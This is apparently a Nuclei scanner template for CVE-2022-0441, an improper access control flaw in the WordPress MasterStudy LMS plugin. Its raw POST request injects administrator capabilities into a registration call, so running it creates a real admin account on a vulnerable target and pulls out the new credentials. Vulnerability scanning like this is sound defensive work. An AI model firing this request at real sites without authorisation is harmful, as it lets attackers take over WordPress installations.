id: CVE-2022-0441 info: name: MasterStudy LMS <2.7.6 - Improper Access Control author: dwisiswant0,theamanrawat severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ - https://plugins.trac.wordpress.org/changeset/2667195 - https://nvd.nist.gov/vuln/detail/CVE-2022-0441 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0441 cwe-id: CWE-269 metadata: verified: "true" tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json {"user_login":"{{username}}","user_email":"{{user_email}}","user_password":"{{password}}","user_password_re":"{{password}}","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}} extractors: - type: regex name: nonce group: 1 regex: - '"stm_lms_register":"([0-9a-z]+)"' internal: true - type: kval kval: - user_email - password req-condition: true matchers-condition: and matchers: - type: word part: body_2 words: - 'Registration completed successfully' - '"status":"success"' condition: and - type: word part: header_2 words: - application/json; - type: status status: - 200 # Enhanced by md on 2023/04/06